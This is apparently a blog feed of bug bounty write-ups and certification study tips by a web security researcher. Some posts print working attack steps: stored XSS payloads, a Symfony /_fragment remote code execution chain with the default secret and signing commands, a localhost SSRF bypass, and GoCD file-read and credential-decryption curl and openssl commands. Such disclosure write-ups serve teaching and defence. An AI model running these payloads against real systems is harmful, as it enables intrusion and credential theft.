For those who need a little encouragement, I suggest diving into the concepts you love. This industry is an addiction for me, and I can't go a day without doing something related to hacking. Whether it's reading a technical CVE write-up, watching DEFCON videos, working on PortSwigger Labs, or hacking on bug bounty programs, there's always something to engage with.

If you have any questions or need some guidance, please feel free to reach out to me on Twitter via DM (@grumpzsux). I love helping newcomers in the industry.

Happy hacking my fellow nerds,
- GRuMPz aka Sergio Medeiros

]]><![CDATA[CVE-2024-34241: A Step-by-Step Discovery Guide]]>https://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guidehttps://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guideFri, 17 May 2024 04:11:20 GMTIt was late at night, and I was starting to burn out from hunting bugs in a few bug bounty programs I am active on. I still had that hacker itch I wanted to scratch, so I decided to look at a few web applications to see if I could find any easy "0days" to add a few more web-based CVEs to my resume.

My requirements are quite simple. To warm up, I usually look for PHP applications that are actively maintained, have a decent sales volume or user base, and are ideally open-source so I can access the source code. Additionally, I prefer applications with a low number of previous CVEs reported on older versions. I decided to check out the PHP applications sold on https://codecanyon.net/, a marketplace for developers selling various applications, plugins, and more.

I decided to search for popular PHP scripts because higher sales numbers usually indicate a decent user base. I found that Rocket LMS, a learning management system, had over 2,700 sales and 5-star reviews. I felt this would be an ideal target.

I decided to use the "instructor" user account, assuming it would offer additional functionality to explore. When I landed on the dashboard, I started testing the input fields with some simple payloads, and the application seemed to sanitize the user input very well. Eventually, I navigated to the Courses section, which allows me to create and edit new courses for my students. What intrigued me about this functionality was the use of a WYSIWYG editor in the Description section. Further research confirmed that the WYSIWYG editor implemented by RocketSoft is Summernote version 0.8.18.

Given the history of various WYSIWYG editors suffering from consistent reflected cross-site scripting and stored cross-site scripting vulnerabilities, I felt this was a good opportunity to see what I could find. I decided to input a simple XSS payload and saved the record, but the payload did not execute and appeared to be properly sanitized.

Next, I saved the course record with random text in the Description section and intercepted the POST request using BurpSuite. I then modified the description parameter with my XSS payload and forwarded the request:

<details/open/ontoggle=prompt(origin)>

I then navigated back to the course record and saw that the application had stored and executed our malicious payload. This immediately prompted the origin, confirming that we had DOM access. I realized that this simple "bypass" indicated a systemic issue throughout the entire application where the Summernote WYSIWYG editor is used.

I sat there and asked myself if this had already been reported. A quick Google search showed it hadn't been. I guess it was my lucky day; I found a new CVE in 10 minutes.

I will end this write-up as I always do. You don't need to be a super hacker to find CVEs or bugs on bug bounty platforms. As long as you consistently practice exploiting different vulnerabilities, you'll train yourself to see things from a hacker's perspective. In my opinion, passion for hacking and thinking like a hacker are the key traits that separate the good from the great in this industry.

Until next time my fellow nerds,
Sergio Medeiros

]]><![CDATA[Review of the Certified AppSec Pentester Certification: Tips for Passing on Your First Attempt]]>https://grumpz.net/review-of-the-certified-appsec-pentester-certification-tips-for-passing-on-your-first-attempthttps://grumpz.net/review-of-the-certified-appsec-pentester-certification-tips-for-passing-on-your-first-attemptWed, 08 May 2024 02:52:38 GMTI was scrolling through LinkedIn and noticed a couple of hackers on my newsfeed posting that they passed the mock exam for the CAPen Certification by The SecOps Group. This caught my interest because I had never heard of the Certified AppSec Pentester before or knew that The SecOps Group was a certificate authority. While researching, I came across a coupon code that allowed me to buy the exam voucher for 80% OFF, totaling just $50, which also includes a free retake! I thought to myself, "Why not? That's an unbeatable deal!"

I ended up purchasing an exam voucher and received an email confirming my order. The email mentioned that I would get my exam link and VPN configuration details within 2 business days. I was pleasantly surprised to receive the exam link and VPN configuration in less than 24 hours!

I decided to begin the exam right after work because I couldn't resist using the exam voucher I had. Starting the exam was simple: log in, click the start exam button, and connect to the exam environment using openVPN. The whole process is fully automated.

They provide you with slightly over 4 hours to answer 17 questions. Some are multiple choice, and some require you to submit flags, which is quite similar to the new eWPTv2 exam, as far as I know. Four hours is plenty of time to tackle the challenges. Once you finish, you simply click the finish button. You'll immediately find out if you passed or failed. If you passed, you receive your certification instantly. The whole process is entirely automated. The user experience is fantastic; I really enjoyed it.

With that said, I am proud to announce that I am officially a Certified AppSec Pentester, CAPen Certified.

👉 Interested in taking a shot at the CAPen Certification Exam? Here's an 80% OFF voucher that you can use, which includes a free retake with no wait time!

🎁 Coupon Code: CAPen-80-OFF

👇 Tips to Pass the CAPen Exam 👇

As mentioned before, you have a little over 4 hours to answer multiple-choice questions and submit flags covering different OWASP Top 10 vulnerability categories like XSS labs, SQLi labs, and XXE injection, among others. The SecOps Group concentrates on being a certificate authority, so they expect you to study the technical concepts on your own. However, they do offer a syllabus for the CAPen exam to guide your preparation.

However, I wanted to expand on this and provide more focused material to help anyone preparing for this certification, to improve your chances of passing on your first attempt!

You have my assurance that if you review the information below, you will be well-prepared. And here's the good news: if you don't pass, you can retake the exam immediately, and the best part is, you only paid $50 for it.

1. Recon / Enumeration

For recon and enumeration, if you feel ready for an intermediate-level certification, this should be quite straightforward for you. Nonetheless, I wanted to offer a few resources just in case.

2. Cross Site Scripting (XSS)

For cross-site scripting, remember that CAPen is an intermediate certification. While you don't need to be an expert, you should be able to recognize various XSS contexts and know how to create payloads when there is sanitization, encoding, or filtration.

I recommend checking out the following links to make sure you understand these concepts. Then, practice hands-on by using the Portswigger Web Academy labs mentioned below.

3. Cross Site Request Forgery (CSRF)

For this category, understanding how to attack and PREVENT CSRF attacks will greatly benefit you when actively testing in the exam environment.

I recommend reviewing the following links to ensure you are familiar with these topics, and then practice hands-on using the Portswigger Web Academy labs mentioned below.

4. Insecure File Uploads

For this vulnerability, although there are various ways to exploit it, I recommend keeping it simple and not overthinking it.

I suggest reviewing the following links to make sure you understand these topics, and then practicing hands-on with the Portswigger Web Academy labs mentioned above.

5. Cloud Misconfigurations

For "cloud misconfigurations," please don't be intimidated by the term. The SecOps Team has additional certifications for cloud-based pentesting. However, you should understand how to exploit common misconfigurations and security flaws in popular cloud services like S3 buckets.

I recommend checking out the following links to make sure you understand these topics. Then, practice hands-on with the flAWS Cloud and flAWS2 Cloud labs mentioned below.

6. Access Control (authorization/authentication)

For access control-related vulnerabilities, I recommend learning about common password reset flaws and insecure direct object references.

I suggest reviewing the following links to make sure you understand these topics, and then practice hands-on using the Portswigger Web Academy labs mentioned below.

7. SQL Injection

For SQL Injection, I recommend understanding how to test for SQL injection manually and then using the SQLmap tool to simplify your work. While the exam might require more detail on various SQLi contexts, the solutions are quite straightforward for an intermediate certification level. Remember, a ' can go a long way!

I suggest reviewing the following links to ensure you are comfortable with these topics, and then practice hands-on by using the Portswigger Web Academy labs mentioned below.

8. XML External Entity Injection (XXE)

For XXE Injections, I believe the solution is quite straightforward, although it could delve deeper into different contexts and types of XXEs that can be exploited. Nonetheless, the solution is pretty simple.

I recommend checking out the following links to make sure you understand these topics well, and then practice hands-on by using the Portswigger Web Academy labs mentioned below.

🧠 Final Thoughts 🧠

All in all, the Certified AppSec Pentester (CAPen) certification was enjoyable, and the attack scenarios are quite realistic. However, I believe that some of the vulnerability categories might be a bit too simple for a mid-tier certification, especially when creating effective payloads, and could be more challenging. Nevertheless, the exam setup is robust, the on-demand experience was excellent, and I highly recommend taking this certification if you want to validate your skills as a web application penetration tester. It's a great step towards reaching the expert level. I would compare it to the eWPTv2 exam but with more variety, and you can get it for $50 using the coupon code below. That's a deal that's hard to pass up.

👉 Interested in taking a shot at the CAPen Certification Exam? Here's an 80% OFF voucher that you can use, including a free retake with no wait time:

🎁 Coupon Code: CAPen-80-OFF

If you have any questions, feel free to ask me. Just send me a direct message on Twitter at twitter.com/grumpzsux.

Until next time my fellow nerds. Sergio Medeiros

]]><![CDATA[Finding a Basic RCE Vulnerability on a Prominent News Channel]]>https://grumpz.net/finding-a-basic-rce-vulnerability-on-a-prominent-news-channelhttps://grumpz.net/finding-a-basic-rce-vulnerability-on-a-prominent-news-channelSat, 04 May 2024 19:51:00 GMTUsually, when newcomers approach me in the bug bounty field, they often ask about the tools, methods, and any other "secret sauce" I use when searching for vulnerabilities in bug bounty programs. I'm sure many of them might feel I sound arrogant or condescending when I reply, "Concentrate on recon, and search on Google for things you don't get." This discovery truly confirms this idea.

I decided to take a look at a private program late last night, but wanted to just casually look. I set my scope in BurpSuite to the primary FQDN that was in-scope at the time, and decided to manually "walk the app", and passively collect requests in BurpSuite. Going back to BurpSuite, I noticed that one of the requests hit on a BCheck Template that I had (more on this in another article) which showed that the application had Symfony Debug Mode enabled, and the /_profiler endpoint was accessible publicly. I decided to navigate to the URL in browser to see what information was available to help me finding something impactful to report.

https://redacted.com/_profiler

I found this interesting and decided to search on Google to learn more about Symfony and any known vulnerabilities. I wasn't looking for information disclosures. I discovered that Symfony is a free and open-source PHP framework that makes web development faster and easier. There is a known Remote Code Execution vulnerability on the /_fragment endpoint. In my research, I found out that Symfony has a built-in feature called /_fragment which allows clients to input custom PHP commands and receive HTML output. It secures requests with a secret key to prevent misuse. However, if the secret key is weak or leaked, it could lead to Remote Code Execution. This means that anyone with the /_fragment secret key can run PHP code on the server, potentially causing Remote Code Execution.

Armed with this information, I proceeded to navigate to the URL in my browser to see what happens.

https://redacted.com/_fragment

However, when I attempted to access this endpoint, I encountered an Access Denied error. This prompted me to investigate further to determine my next steps. I discovered that the /_fragment endpoint responds with a 403 Forbidden status code when an invalid request is made to it. However, if a valid signature is provided, the endpoint is expected to return a 404 Not Found status code. The signature is created using the HMAC algorithm and plain text, which includes the URL and a secret key. This secret key is only known to the server. If the signature doesn't match the expected value, the request is denied.

Well, that's great, but how can I obtain the secret key to sign requests for accessing this endpoint and proceed with my investigation? Many individuals tend to give up too easily and are "inches from gold." This means that if they exerted a little more effort, they would discover the success they seek in this field.

After further research (Googling), I discovered that Symfony utilizes a default secret key. If this key hasn't been altered, it should provide the desired outcomes. This secret key might be exposed in different places, such as phpinfo(). Considering time constraints, I assumed it was still in use. The default secret key for Symfony is: "ThisTokenIsNotSoSecretChangeIt".

Armed with this information, I used PHP to generate a valid signature with the default secret key to test my luck for the night. The code creates an HMAC signature for the provided URL/Endpoint, secret key, and algorithm. It then encodes the signature using base64 and URL encoding. The resulting output is utilized to send requests to the /_fragment endpoint.

php -r "echo(urlencode(base64_encode(hash_hmac('sha256', 'https://redacted.com/_fragment', 'ThisTokenIsNotSoSecretChangeIt', 1))) . PHP_EOL);"

As seen in the screenshot below, we have generated a hash that we can use to check its validity.

In order to check the validity of the hash that I just generated, I needed to send a request to the /_fragment endpoint, and append my outputted hash to the _hash parameter, and issue the GET request.

https://redacted.com/_fragment?_hash=<generated-hash-here>

To my surprise, I no longer received the Access Denied error. Instead, I got a 404 status code, confirming that the hash I generated is valid. Now, it's time to dig deeper and see if I can achieve RCE now that I have access to the /_fragment endpoint.

I could smell the money raining from the sky, even though the RCE wasn't confirmed yet, my excitement almost got the best of me.

After regaining my composure, I had to continue progressing towards my main objective. Since we've verified the hash's validity, to exploit this, we must utilize the path parameter in conjunction with the controller, system function, and the desired command. Then, we follow the same steps as before to obtain a valid signature for the Exploit URL.

It basically sets the _controller value as the system function, and then executes the id command.

_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull

I then used PHP once more to generate a valid hash using the default secret for this URL.

php -r "echo(urlencode(base64_encode(hash_hmac('sha256', 'https://redacted.com/_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull', 'ThisTokenIsNotSoSecretChangeIt', 1))) . PHP_EOL);"

I then opened the URL in my browser and, as the skilled hackers would say, BOOM! The RCE attack was successful. We can observe that we have effectively executed the id system command, and its output is displayed on the page.

This concludes your regularly scheduled programming. I hope this demonstrates that you don't need to use lots of tools, scanners, or random payloads to discover critical P1 vulnerabilities. Take the time to understand what you're dealing with, and search online for anything you need to know or don't understand. Remember, tools and scripts don't define the hacker; it's the hacker who creates the tools and scripts. Slow down, think like a hacker, tackle each challenge step by step, and utilize Google to learn about unfamiliar concepts. Hacking isn't about spraying and praying. It's a mindset that involves being curious and willing to learn something new, enabling you to manipulate systems to your advantage.

Until next time... Sergio Medeiros

]]><![CDATA[Uncovering an SSRF Vulnerability in PDFMyURL Affecting Numerous Users]]>https://grumpz.net/uncovering-an-ssrf-vulnerability-in-pdfmyurl-affecting-numerous-usershttps://grumpz.net/uncovering-an-ssrf-vulnerability-in-pdfmyurl-affecting-numerous-usersMon, 22 Apr 2024 00:03:57 GMTWhile enumerating the scope of a target on a private bug bounty program, I came across a subdomain used for generating PDF files. However, it seemed out-of-scope as they were simply white labeling a service called PDFMyURL, which lets you convert any URL or web page into a PDF.

I couldn't resist exploring the functionality to understand how their service operates. It's quite straightforward. By sending a simple POST request with a URL parameter and the relevant URL, the backend application will change the user-provided URL into a downloadable PDF file.

Given that the web application sends requests to a specific location to generate a PDF file, I started testing the application to check for Server-side Request Forgery (SSRF) vulnerabilities. SSRF is a flaw that enables an attacker to make the server-side application send requests to unintended places. This could lead the server to connect to internal services that are meant to be accessed only within the organization's infrastructure.

After testing the application for Server-side Request Forgery (SSRF) vulnerabilities, I found that the security measures in place effectively blocked SSRF attacks. I attempted common bypass techniques using decimal and octal formats but was unsuccessful in my attempts.

I then tried using various IP variations within the 127.0.0.0/8 CIDR range for localhost. In particular, I entered the URL http://127.127.127.127 into the PDF generator. This allowed me to successfully bypass the security measures in place, enabling us to generate the PDF.

As seen in the response section of BurpSuite in the screenshot above, our PDF was successfully generated. The title indicates (Apache2 Ubuntu Default Page: It works!), confirming our ability to access the localhost of the underlying host. The application handled our localhost payload and displayed the output in the PDF file.

And there we have it. We successfully created a simple yet effective payload that bypassed the SSRF security controls in place. This allowed us to exploit a full read SSRF by using the localhost CIDR range. It's a valuable lesson for beginners in bug bounty hunting: having a solid testing approach, working through challenges, and persisting until you reach your desired outcomes.

Further investigation revealed a widespread issue affecting numerous customers and thousands of users, leading to a pending CVE.

Remember, fellow hackers, keep exploring the digital realm, and hacking the planet.

Sergio Medeiros

]]><![CDATA[Hunting and Finding CVE-2023-31045]]>https://grumpz.net/hunting-and-finding-cve-2023-31045https://grumpz.net/hunting-and-finding-cve-2023-31045Wed, 31 May 2023 21:58:29 GMTSince I began my journey of becoming a professional "hacker" and bug bounty hunter, I've always been fascinated by researchers who hunt and look for zero days in web applications. I've envied them, as I felt that having CVEs tied to your name as a security researcher is like a stamp of approval, a trophy, which formalizes you as a top-tier "hacker".

Finally, I'm proud to announce that I have successfully found a valid CVE that is tied to my name, though disputed by the vendor, I feel it is still an accomplishment, and caused them to roll out a new version 2 days later. This vulnerability is for version 1.24.1 and has been patched in their 1.24.2 release.

This is the story of hunting and finding CVE-2023-31045 in the Backdrop CMS application.

Given that this was my first time attempting to hunt for a 0-day, my thought process was to find an open-source project that is actively maintained by a community of developers, along with a decently sized user base of the target application. I felt that an open-source project will allow me to easily access the source code if a code review was required to identify a vulnerability. This led me down the path of Content Management Systems.

I ultimately found Backdrop CMS as a viable candidate that fit my ideal testing parameters. When I landed on the Backdrop CMS homepage, I found that I was able to spin up a live demo with their latest version directly from their site.

In doing so, I was able to authenticate as the Administrator user and began testing the functionality within the dashboard UI. I started by testing for Cross-Site Scripting (XSS) vulnerabilities in the user input fields.

The Backdrop CMS gives administrators the option to use various formatting editors within their CMS, for example, Raw HTML, or Filtered HTML formatting, along with adding custom formatting options, that you can select from a drop-down menu when you are publishing a blog post or any other content type.

After testing various input fields to see how the user input is sanitized by the application, I learned that the CMS is pretty secure for the most part as the application strips out most of the HTML tags, or event handlers that a user inputs. However, after some digging, I landed under the Text Editors and Formats functionality, by following the click path:

Configuration -> Content Authoring -> Text Editors and Formats -> Add Text Format

I realized that if I input special characters, and event handlers in the Name input field when creating a new text format, none of the characters are stripped, and are stored in the application. Though I was not able to escape the filtering, and the payload was not processed or executed, I managed to complete the first step, which is bypassing the filtration of special characters and event handlers.

I inputted the following XSS payload which can be seen below:

serg<details/open/ontoggle=prompt(1337)>

I started thinking in terms of "Second Order". Meaning, maybe the payload can be processed in a different part of the application. If you are unfamiliar with second-order injections, second-order XSS attacks involve the use of databases and occur when developers let attackers elevate input to the command level.

This led me to the Manage Content functionality. As an Administrator user, I followed the click path below:

Content -> Manage Content

This functionality allows you to create, edit, or delete different content types. For testing purposes, I decided to modify a default page, which was the "About" page. When editing, this brings you to a new dashboard, which allows you to make the appropriate changes. I quickly saw my opportunity to fire my stored XSS payload, when I saw the option "Formatting Options" under the "body" field. When you expand this box, you should now see three options to choose from, in the drop-down menu.

If we select the option, which is our stored XSS payload that we set earlier in the Text Editors and Formats section, we will see that the application processes and renders our malicious payload.

The developers forgot to sanitize the user input in the formatting options drop-down menu, which allowed us to execute our malicious JavaScript payload successfully.

I would like to give kudos to the Backdrop CMS Security team, as they responded to my email informing them about the vulnerability in less than 24 hours, and rolled out a patch/updated version of Backdrop CMS in 48 hours. Though they dispute this vulnerability, as they state the Administrator user can control the HTML with the application, the failure to sanitize user input in a drop-down menu that executes a stored XSS payload, still creates an impactful attack vector for attackers looking to exploit the Backdrop CMS application.

Nevertheless, I am proud of this accomplishment, though I wish it was a more advanced attack chain, however, there are more opportunities in the future!

If you have any questions, please do not hesitate to DM me on Twitter at GRuMPzsux

Sergio Medeiros

]]><![CDATA[Pass the eWPTXv2 Exam on Your First Attempt in 2023!]]>https://grumpz.net/pass-the-ewptxv2-exam-on-your-first-attempt-in-2023https://grumpz.net/pass-the-ewptxv2-exam-on-your-first-attempt-in-2023Wed, 31 May 2023 05:53:35 GMTFinally! As promised, I am sharing my tips and tricks on how to pass the eWPTXv2 exam by INE and eLearnSecurity on your first attempt, using nothing but free resources. This exam is by far the hardest exam that I have taken to date, and I thought it would be the one that ends my streak when it comes to passing certification exams on my first pass. But.. I did it.

But of course, if you'd like proof, here it is: https://verified.elearnsecurity.com/certificates/a7cdc42b-bb12-4e72-bdfe-96105864d55e

All jokes aside, if you struggled through the eWPT exam, then you are not ready for the eWPTXv2 exam. In my opinion, INE/eLS should have created a certification in-between the eWPT and eWPTX given the degree of difficulty. If you struggle with Java Deserialization RCEs, Server Side Template Injections, PHP Object Injections, advanced SQLmap usage or the ability to chain vulnerabilities together, then you may want to hit the labs. I suggest being comfortable in reading code, along with being able to write simple scripts with a focus on PHP! ;) However, don't fret! I am outlining the resources I used to prepare, and some of the vulnerabilities to anticipate for your journey ahead.

Also, I am available on Twitter @grumpzsux if you have any questions, please feel free to shoot me a DM.

However, I will NOT be giving out any answers! If I had to feel the pain and sleep in a puddle of my own tears in the fetal position, you shall too!

Let's get this party started.

Master the Art of The Following Vulnerabilities:

PHP Object Injection

Java Deserialization

Server Side Template Injection (SSTI)

Server Side Request Forgery (SSRF)

Second Order SQL Injection

Note: please do not depend on SQLmap for each SQL injection that you find, not all of them can be exploited using SQLmap, and you may need to exploit them manually. In this case, be sure that you understand why you are using special characters like ' or # when testing manually. ;)

Anti-CSRF Token Bypass using SQLmap

Out-of-Band (OOB) XML eXternal Entity Injection

Host Header Injection

De-Obfuscate JavaScript Code

PHP Coding Resources

Stored Cross Site Scripting (SXSS) <-- assuming you're 31337 already
Reflected Cross Site Scripting (RXSS) <-- assuming you're 31337 already
Time-Based SQL Injection (SQLi) <-- assuming you're 31337 already

Just to finish this article off, please ensure that your enumeration through each phase of the cyber kill chain is diligent. Don't be afraid to dig deep, checking for hidden directories, subdomains, and endpoints that can be used to craft attack chains. Just because you find one vulnerability, don't stop there, see if there is a way to chain that vulnerability to another vulnerability to create a more impactful attack chain. ;)

I feel that this exam is worth doing if you are going to focus on web applications, I feel the attack chains are modern, and not as out dated compared to the eWPT exam. Given that I triage reports for a living at Synack, I am exposed to web app vulnerabilities all day, and it aligns fairly well compared to what is being submitted currently.

Critical thinking is what will make you successful.

Good luck my fellow nerds. - Sergio Medeiros

]]><![CDATA[Pass The eWPT Exam in 2023 Using Free Resources on Your First Attempt!]]>https://grumpz.net/pass-the-ewpt-exam-in-2023-using-free-resources-on-your-first-attempthttps://grumpz.net/pass-the-ewpt-exam-in-2023-using-free-resources-on-your-first-attemptTue, 13 Dec 2022 08:35:48 GMTI began my journey pursuing a cyber security career professionally about a year ago, with the focus on obtaining only hands-on practical certifications with the intent to pivot careers after a decade-long run in Sales. Currently, I have obtained the eJPT, eCPPTv2, eWPT and eWPTXv2 certifications, and work on the Vulnerability Operations team at Synack.

With that being said, I wanted to talk through my journey on how I managed to pass the eWPT exam on my first try, without using any of the INE resources.

Yes, it can be done! How bad do you want it?

(proof of my certification, if you need to be convinced, lul.)
https://verified.elearnsecurity.com/certificates/a6f33825-769e-49ba-b8f5-b12aeac81c6f

ewpt-exam-notes

First, let's start with the obvious if you have completed your eJPT, or even your eCPPTv2 certifications, you may find this certification challenging if you have not sharpened your skillset for pentesting web applications. If you are not comfortable with exploiting Boolean Blind, Error Based, and Time Based SQL Injections, or testing for Reflected and Stored Cross Site Scripting vulnerabilities, along with detailed professional report writing, I highly suggest you follow the material I list below.

To summarize the tasks that you need to complete during the exam, you will need to show that you can access a restricted Admin area of the web application. However, just being able to do so is not sufficient to pass. You will need to treat this exam as if you were hired by the client, audit every asset owned by the client, and report every vulnerability that you found, including informational findings that may be valuable to the client. (I did!)

I enjoy providing value to this community, and the best way I can do that is by providing the resources I used to study that helped me pass the exam on my first attempt. I highly suggest that you use this article as your bible when preparing to take the eWPT exam.

Side Note: Please do NOT reach out to me if you think I will give you the answers for the exam. I felt the pain, you will feel the pain too. Don't be lazy. If you reach out looking for answers on the exam, this isn't the industry for you. Don't be a n00b.

Buckle up buckaroos! Let's get this party started!

Cross Scripting Resources

Reflected XSS

Stored/Persistent XSS

SQL Injection Resources

Remember.. SQLmap is your best friend when exploiting these vulnerabilities. The -r switch goes a long way! ;-)

Boolean Blind SQL Injection

Error-Based SQL Injection

Time-Based SQL Injection

File Upload Exploitation

\cough\ I highly suggest you become a guru here. \cough\ ;-)

Session Hijacking

Enumeration

Subdomain Brute Forcing

Directory Busting

Low/Informational Vulnerabilities

Report Template

Wrapping up this post, my report turned out to be 102 pages, granted, it had a TON of screenshots, and I reported every finding I found. I wanted to be as thorough as possible, as this exam focuses heavily on being a "live" pentest, and the report writing element. You can crush the practical exam, but if you submit a bad report, they will fail you. Please for the love of god, focus on the report quality!

All in all, I feel the exam is laid out pretty well, granted some of the exploits are starting to become a bit obsolete, but I was still banging my head against the keyboard.

Remember... eat. sleep. shower. go outside. (without your hoodie)

You have 7 days to hack everything and reach the Admin area, and another 7 days to write a professional report, which I feel is more than enough time to complete. I did the hands-on part in roughly 2 days. However, to be fair, this is my career, which is solely focused on web exploitation.

eLearnSecurity, responded in 24 hours after I submitted my report!

I hope I was able to provide some value for you guys and gals. If you have any questions, please reach out to me on Twitter: @grumpzsux

Hack the planet, my fellow basement dwellers.

-GRuMPz

]]><![CDATA[Pass the eCPPTv2 Exam on Your First Attempt in 2022]]>https://grumpz.net/pass-the-ecpptv2-exam-on-your-first-attempt-in-2022https://grumpz.net/pass-the-ecpptv2-exam-on-your-first-attempt-in-2022Tue, 15 Mar 2022 23:21:51 GMTI started my journey with practical certifications in the Cyber Security world because I have been trying to pivot careers after being in technical sales in the Fintech space for nearly a decade.

After obtaining my eJPT and eCPPTv2 certifications, I am proud to announce that I am now an Information Security Analyst for Synack on their Vulnerability Operations team.

With that being said, I wanted to talk through my journey on how I managed to pass the eCPPTv2 exam on my first try, without using any of the INE resources.

Yes, it can be done! How bad do you want it?

(proof of my certification if you don't believe me haha) https://verified.elearnsecurity.com/certificates/2dabc4f1-6fbe-4e6f-bc65-3f26368e9da9

image.png

Let's start off with the obvious. If you passed your eJPT, and think it is a similar exam, I promise you, you will be in for a very unpleasant surprise. The eCPPTv2 exam is similar to the OSCP in my opinion aside from the obvious, which is being able to use any tool that you want, and that you have 7 days to hack all the targets.

If you are not comfortable with pivoting through multiple subnets, privilege escalation methods for Linux and Windows, identifying buffer overflows and writing a script to exploit the buffer overflow, along with detailed professional report writing, I highly suggest you follow the material I list out below.

I used a mix of paid and free resources to study, and to be honest, you could get away with passing this exam without spending a dime in study material if you are really committed.

The best way I can add value to the community is be providing the resources I used to pass the exam. I suggest that you use the following resources as your bible when it comes to preparing for the eCPPTv2 exam, and I can almost guarantee you will pass.

Side Note: Please do NOT reach out to me if you think I will give you the answers for the exam. I felt the pain, you will feel the pain too. Don't be a lazy n00b.

Let's get this show on the road boys and gals!

Privilege Escalation Resources:

Pivoting Resources:

Buffer Overflow Resources:

Metasploit / MSFVenom Resources:

Misc. Resources:

Report Writing Resources:

Before I end by write up, I want to leave you with a few personal tips of mine. I hope they are helpful for you.

  1. Make sure that you screenshot everything, from enumeration, too exploitation. I created folders for each machine by IP address and stored every screenshot in there.
  2. If an exploit doesn't work for you, try different payloads. You have hundreds of payloads available to you, just because your reverse shell doesn't work, doesn't mean your exploit didn't.
  3. Enumerate EVERYTHING. Continue to enumerate through each phase of your methodology.
  4. Post exploitation is KEY. Be diligent, dig through everything. You never know what you might find that will help you to get to the next box, subnet, etc.
  5. Do not underestimate the report. People have failed solely on the report. In my opinion I struggled more on the report than I did the actual pentest. Remember this is a mock professional pentest, I highly suggest you treat this as if you are working with a live client.
  6. Take breaks. Sleep. Eat. Shower.
  7. If you are stuck, google. I did. I dug deep!

Wrapping this up, my report was around 70 pages, mainly because I walked through every step of the exploit, provided screenshots for each step, and I provided detailed remediation steps. Please for the love god, pay special attention to your report. Add everything you find, I don't care if it's a reflected XSS, add it in the report. Treat this report and exam like a live client.

eLearn Security laid out this exam really well. I actually enjoyed it even though I was banging my head on the keyboard somewhat frequently. You have 7 days to complete the hacking portion which is MORE than enough time to do it. They also provide an additional 7 days to complete the report, I would savior every moment of it. I did.

It took eLearn Security around 14 days to get back to me with my results.

If you have any questions, please feel free to reach out to me on twitter: https://twitter.com/grumpzsux

I hope this was helpful. Hack the planet nerds.

]]><![CDATA[Pizza Hut DevOps Hate Me. Yet Love Me? - A Bug Bounty Story]]>https://grumpz.net/pizza-hut-devops-hate-me-yet-love-me-a-bug-bounty-storyhttps://grumpz.net/pizza-hut-devops-hate-me-yet-love-me-a-bug-bounty-storyTue, 15 Mar 2022 01:21:47 GMTWhile doing some basic recon, and digging through subdomains on various targets on different bug bounty platforms and VDP's, I came across something interesting hanging around on the Pizza Hut domain that peaked my interest.

Looking at the authentication page, I realized it was an instance of GoCD a popular CI/CD solution, in my opinion a critical piece of infrastructure because if you are looking to automate your build and release processes, a centralized CI/CD solution has access to various production environment's including private source code repositories.

After researching more about GoCD I found that there is a vulnerability that lets unauthenticated attackers leak highly sensitive information from a vulnerable GoCD server instance, including all all encrypted secrets stored on the server (CVE-2021-43287).

**Lucky me, they were running a vulnerable version. **

image.png

All GoCD instances within the version range v20.6.0 to v21.2.0 are impacted.

The first thing I decided to check for is a known Local File Inclusion vulnerability to see if I was able to access the /etc/passwd file.

curl -v "http://[REDACTED].pizzahut.com/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"

Well that was easy, now that I know the LFI is active, let's try to grab the cruise_config file.

The cruise_config file is essentially the GoCD server configuration file that contains all the juicy secrets that we leet h4x0rs get excited for.

curl -v "http://[REDACTED].pizzahut.com/go/add-on/business-continuity/api/cruise_config"

When I received the response, I was blown away as to what I found. From various encrypted hosts, api keys, username/password combos for multiple production environments. The keys to the kingdom!

However, everything was encrypted with AES, so my excitement was short lived.

image.png

After continuing my research and looking for a way to find the encryption key that was used, I literally laughed out loud as to how simple it was to find the key. It was a simple curl request for a file in the SAME directory called cipher.aes.

curl -v "http://[REDACTED].pizzahut.com/go/add-on/business-continuity/api/cipher.aes"

image.png

After collecting myself, I decided to go through the cruise_config file and decrypt a few things to confirm that I in fact had the valid encryption key. I decided to take a peak at their sFTP credentials. I decided to use openssl to start decrypting the credentials.

openssl aes-128-cbc -d -a -K [CIPHER.AES_KEY_HERE] -iv $(xxd -p <(base64 -d <<<[ENCRYPTED_CREDS_HERE])) <<<[ENCRYPTED_CREDS_HERE]

Welp.. I now have access to EVERYTHING.

However, the impact here is far greater than having access to everything used in the cruise_config file.

There is also an auto register key that allows you to register a rogue agent to inject your code directly into the build pipelines and create a true supply chain attack, just like what happened to Solarwinds.

This wraps my first valid finding during my bug bounty hunting career!

For more information about Pre-Auth Takeover of Build Pipelines in GoCD (CVE-2021-43287), I found the Rapid7 Analysis extremely helpful: https://attackerkb.com/topics/ShpnUFlqDz/pre-auth-takeover-of-build-pipelines-in-gocd-cve-2021-43287/rapid7-analysis?referrer=search

]]>